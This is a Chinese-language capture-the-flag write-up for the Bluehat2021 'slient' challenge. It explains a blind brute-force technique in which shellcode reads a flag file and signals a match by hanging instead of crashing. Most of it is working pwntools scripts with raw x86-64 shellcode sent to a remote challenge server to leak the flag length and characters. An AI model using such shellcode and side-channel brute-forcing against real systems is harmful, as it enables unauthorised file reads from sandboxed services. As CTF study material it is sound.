Bluehat2021-slient-WP
这题没啥意思,就是爆破。由于无法输出任何东西,需要有能代表是正确的标志,可以使用 jmp 0 的方法,如果爆破正确则 jmp 0,否则 jmp 到一个乱七八糟的地方造成段错误,这样通过是否有 got eof 就可以判断了。
使用 shellcraft 可以获得 shellcode
shellcode = asm(shellcraft.amd64.syscall('SYS_open',0x10000 + 0x30,0).rstrip())
shellcode += asm(shellcraft.amd64.syscall('SYS_read',3,0x10500,40).rstrip())
shellcode += asm("cmp rax,12")
shellcode += "\x75\x02" # jne 2
shellcode += "\xeb\xfe" # jmp 0
shellcode = shellcode.ljust(0x30,'a')
shellcode = asm(shellcraft.amd64.pushstr("/home/pwn/flag"))
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.log_level = 'debug'
context.arch = "amd64"
context.terminal = ["tmux","splitw","-h"]
for i in range(18,19):
sh = remote("8.140.177.7",40334)
#sh = process("./chall")
shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x31"
shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
shellcode += "\x01\x04\x03\x01\x0f\x05\x48\x83\xf8"
shellcode += struct.pack("B",i)
shellcode += "\x75\x02\xeb\xfe\x61"
#shellcode += "\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67\x00"
shellcode += "../pwn/flag"
log.success(str(i))
sh.sendafter("box.\n",shellcode)
sh.interactive()
sh.close()
通过这个脚本可以获得 flag 的长度,同时也可以套出一个更短的访问 flag 的路径 “../pwn/flag”,然后进行之后对 flag 内容的爆破,脚本如下
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'
liter = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>
flag = "flag{k33p_qu14t"
#for i in range(4,18):
for j in range(0,len(liter)):
try:
sh = remote("8.140.177.7",40334)
#sh = process("./chall")
shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x34"
shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
shellcode += "\x01\x04\x03\x01\x0f\x05\x8a\x04\x25"
shellcode += p32(0x10500 + 15)
shellcode += "\x3C"
shellcode += struct.pack("B",ord(liter[j]))
#shellcode += struct.pack("B",ord('q'))
shellcode += "\x75\x02\xeb\xfe\x61\x2e\x2e\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67"
log.success(liter[j])
#log.success(flag[j])
sh.recvuntil("Welcome")
#gdb.attach(proc.pidof(sh)[0])
sh.sendafter("box.\n",shellcode)
#sh.recvuntil(EOF)
sh.interactive()
except:
sh.close()
最后得出 flag:flag{k33p_qu14t!}